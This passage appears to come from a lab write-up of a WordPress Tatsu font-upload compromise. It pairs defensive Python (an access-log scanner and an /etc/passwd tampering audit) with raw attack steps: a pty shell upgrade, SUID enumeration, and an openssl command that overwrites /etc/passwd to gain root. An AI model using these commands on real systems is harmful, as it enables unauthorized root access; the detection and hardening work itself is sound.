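    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: two benign visitors plus the exploit's two requests.
SAMPLE_LOG = """\
10.11.1.5 - - [09/Feb/2025:02:40:01 -0500] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.16.1.1 - - [09/Feb/2025:02:41:10 -0500] "POST /wp-admin/admin-ajax.php?action=add_custom_font HTTP/1.1" 200 58 "-" "python-requests/2.31"
172.16.1.1 - - [09/Feb/2025:02:41:11 -0500] "GET /wp-content/uploads/typehub/custom/whp/.rnsti.php HTTP/1.1" 200 7 "-" "python-requests/2.31"
10.11.1.5 - - [09/Feb/2025:02:42:00 -0500] "GET /wp-content/uploads/2025/02/logo.png HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
10.11.1.9 - - [09/Feb/2025:02:43:00 -0500] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 70 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_font_upload(entry):
    """POST to admin-ajax.php carrying the Tatsu add_custom_font action."""
    path = entry["path"]
    return (entry["method"] == "POST"
            and "/admin-ajax.php" in path
            and "action=add_custom_font" in path)


def is_php_under_uploads(entry):
    """Any request for a .php file below wp-content/uploads, query string ignored."""
    path = entry["path"].split("?", 1)[0].lower()
    return path.startswith("/wp-content/uploads/") and path.endswith(".php")


def scan_log(text):
    """Walk the log once and return findings in order of appearance.

    A .php hit under uploads is 'critical' when the same client issued a
    custom-font upload earlier and the file was served (HTTP 200): that is
    the two-step sequence in the exploit output. Any other .php hit under
    uploads is still 'high', because nothing should execute from there.
    """
    findings = []
    uploaders = set()
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        if is_font_upload(entry):
            uploaders.add(entry["ip"])
            findings.append({"rule": "tatsu_font_upload", "severity": "high",
                             "ip": entry["ip"], "path": entry["path"]})
        if is_php_under_uploads(entry):
            chained = entry["ip"] in uploaders and entry["status"] == "200"
            findings.append({"rule": "php_in_uploads",
                             "severity": "critical" if chained else "high",
                             "ip": entry["ip"], "path": entry["path"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['rule']} {f['ip']} {f['path']}")
```

A 200 for a .php file under uploads also shows that PHP executes from that directory; with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for wp-content/uploads stops that regardless of which plugin did the upload.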
python -c 'import pty; pty.spawn("/bin/bash")'

priv esc
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rws--x--x. 1 root root 24K Feb 2 2021 /usr/bin/chfn ---> SuSE_9.3/10
-rws--x--x. 1 root root 24K Feb 2 2021 /usr/bin/chsh
-rwsr-xr-x. 1 root root 73K Aug 8 2019 /usr/bin/chage
-rwsr-xr-x. 1 root root 77K Aug 8 2019 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 41K Aug 8 2019 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x. 1 root root 543K Mar 28 2022 /usr/bin/openssl

openssl SUID
openssl passwd "newroot"
$1$m8AahRvC$m3n.a6KkxWcg94p2NHuzT0
root:$1$m8AahRvC$m3n.a6KkxWcg94p2NHuzT0:0:0:root:/root:/bin/bash
LFILE=/etc/passwd
echo 'root:$1$m8AahRvC$m3n.a6KkxWcg94p2NHuzT0:0:0:root:/root:/bin/bash' | openssl enc -out "$LFILE"
[root@localhost tmp]# whoami
whoami
root
[root@localhost tmp]# cat /root/key.txt
cat /root/key.txt
3rbjc019bhdsv6784bjk
[root@localhost tmp]# date
date
Sun Feb 9 12:44:07 EST 2025
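The openssl write above leaves /etc/passwd in a state that is easy to recognise on a compromised host: a single root line carrying the MD5-crypt hash inline instead of the shadowed `x` marker, with every other account gone. The block below is an added example, not code from the original writeup: it audits a passwd image for exactly that state, and the baseline account set and the sample images are constructed for the example.

```python
"""Audit an /etc/passwd image for the tampering the openssl write leaves behind.

Added example for this writeup, not code from the original page. It flags
password hashes or empty passwords stored in passwd rather than shadow,
UID-0 accounts other than root, malformed lines, and missing baseline
accounts. The baseline set and all images are constructed; nothing is read
from disk.
"""

# Assumption: accounts every CentOS 7 host is expected to carry.
REQUIRED_ACCOUNTS = {"root", "bin", "daemon", "nobody"}

# Markers that mean "no usable password in this field" (shadowed or locked).
SHADOWED = {"x", "*", "!", "!!"}

# Constructed pre-compromise image.
PASSWD_CLEAN = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
"""

# What the writeup's `openssl enc -out /etc/passwd` left behind: one line, hash inline.
PASSWD_TAMPERED = "root:$1$m8AahRvC$m3n.a6KkxWcg94p2NHuzT0:0:0:root:/root:/bin/bash\n"

# Constructed variant: baseline intact but an extra UID-0 user appended (dummy hash).
PASSWD_EXTRA_UID0 = PASSWD_CLEAN + "svc:$1$dummysalt$dummyhashdummyhashdum:0:0::/root:/bin/bash\n"


def audit_passwd(text):
    """Return a list of {check, user, detail} findings; an empty list means clean."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"check": "malformed", "user": fields[0],
                             "detail": f"line {lineno} has {len(fields)} fields, expected 7"})
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        seen.add(user)
        if pw == "":
            findings.append({"check": "empty_password", "user": user,
                             "detail": "login possible without a password"})
        elif pw not in SHADOWED:
            findings.append({"check": "hash_in_passwd", "user": user,
                             "detail": f"password hash stored in passwd ({pw[:3]}...)"})
        if uid == "0" and user != "root":
            findings.append({"check": "extra_uid0", "user": user,
                             "detail": "second UID-0 account"})
    for user in sorted(REQUIRED_ACCOUNTS - seen):
        findings.append({"check": "missing_account", "user": user,
                         "detail": "baseline account absent; file may have been overwritten"})
    return findings


if __name__ == "__main__":
    for name, image in [("clean", PASSWD_CLEAN), ("tampered", PASSWD_TAMPERED),
                        ("extra uid0", PASSWD_EXTRA_UID0)]:
        print(name, audit_passwd(image))
```

Removing the setuid bit from /usr/bin/openssl (`chmod u-s`) closes the root file-write primitive itself; this check is for establishing whether it was already used.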